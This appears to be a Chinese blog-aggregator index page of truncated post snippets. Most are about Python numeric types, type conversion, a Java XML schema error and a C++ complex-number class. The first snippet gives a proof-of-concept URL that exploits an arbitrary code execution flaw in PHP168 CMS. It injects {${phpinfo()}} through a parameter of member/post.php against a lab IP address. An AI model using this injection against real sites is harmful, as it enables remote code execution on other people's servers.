今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML ...
分类:
Web程序 时间:
2019-04-27 13:19:58
阅读次数:
217
Python的数据类型有3大分类一.有数值类型.数值类型有分为int、float、complex、bool1.数字是一类常见的数据类型,可分为整型、长整型(仅仅在2.版本中存在该类型)和浮点数等常见的几类。比如:123,1.0等2.Bool布尔值用来表示true或false,常常用在条件控制语句中作为条件来判断,系统会根据表达式的内容自动判断true或false,也可以通过print打印输出:3.
分类:
其他好文 时间:
2019-04-27 11:28:07
阅读次数:
123
# 1. None (全局只有一个) a = None b = None print(id(a) == id(b)) # True # 2. 数值 int float complex(复数) bool # 3. 迭代类型 # 4. 序列类型 list bytes、bytearray、memoryvi... ...
分类:
编程语言 时间:
2019-04-27 00:41:07
阅读次数:
156
目标列表元组字典字符串公共方法变量高级知识点回顾Python中数据类型可以分为数字型和非数字型数字型整型(int)浮点型(float)布尔型(bool)真True非0数——非零即真假False0复数型(complex)主要用于科学计算,例如:平面场问题、波动问题、电感电容等问题非数字型字符串列表元组字典在Python中,所有非数字型变量都支持以下特点:都是一个序列sequence,也可以理解为容器
分类:
编程语言 时间:
2019-04-26 19:34:00
阅读次数:
153
Number数据类型(int整型 float浮点型 bool布尔型 complex复数类型) (1)int 整型 (正整形 0 负整型) '''var 指代一个变量''' type 用来获取变量的类型 id 用来获取变量所指向那个值的地址 表达的三重进制整型 (2)float 浮点型即小数 它有两种 ...
分类:
编程语言 时间:
2019-04-25 22:48:25
阅读次数:
187
int(x [,base ]) 将x转换为一个整数 long(x [,base ]) 将x转换为一个长整数 float(x ) 将x转换到一个浮点数 complex(real [,imag ]) 创建一个复数 str(x ) 将对象 x 转换为字符串 repr(x ) 将对象 x 转换为表达式字符串 ...
分类:
编程语言 时间:
2019-04-22 21:17:57
阅读次数:
183
cvc-complex-type.2.4.a: Invalid content was found starting with element 'init-param'. One of '{"http:// xmlns.jcp.org/xml/ns/javaee":enabled, "http:// ...
分类:
Web程序 时间:
2019-04-21 21:45:46
阅读次数:
381
Problem Description Keke is currently studying engineering drawing courses, and the teacher has taught her how to find its volume through the three vi ...
分类:
其他好文 时间:
2019-04-20 09:58:52
阅读次数:
142
#include using namespace std; class Complex { private: double real,imag; public: Complex(double r=0,double i=0):real(r),imag(i){} operator double(){re... ...
分类:
其他好文 时间:
2019-04-18 20:17:59
阅读次数:
108
import this The Zen of Python, by Tim Peters Beautiful is better than ugly. Explicit is better than implicit. Simple is better than complex. Complex i ...
分类:
编程语言 时间:
2019-04-16 00:44:20
阅读次数:
158